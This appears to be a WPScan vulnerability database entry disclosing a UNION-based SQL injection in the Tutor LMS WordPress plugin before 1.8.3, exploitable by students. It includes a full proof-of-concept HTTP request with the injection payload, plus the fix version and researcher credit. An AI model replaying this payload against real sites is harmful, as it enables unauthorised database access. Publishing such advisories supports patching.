WordPress Plugin Vulnerabilities
Tutor LMS < 1.8.3 - SQL Injection via tutor_answering_quiz_question/get_answer_by_id
Description
The tutor_answering_quiz_question/get_answer_by_id function pair from the plugin was vulnerable to UNION based SQL injection that could be exploited by students.
Proof of Concept
POST /courses/first-class/tutor_quiz/test/ HTTP/1.1 Host: [URL] Content-Length: 413 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: [URL] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close _wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&attempt_id=1&tutor_action=tutor_answering_quiz_question&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5&quiz_answer_submit_btn=quiz_answer_submit Then send a GET request to http://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1
Affects Plugins
Fixed in 1.8.3 References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-15 (about 3 years ago)
Added
2021-03-15 (about 3 years ago)
Last Updated
2021-03-20 (about 3 years ago)
WPScan 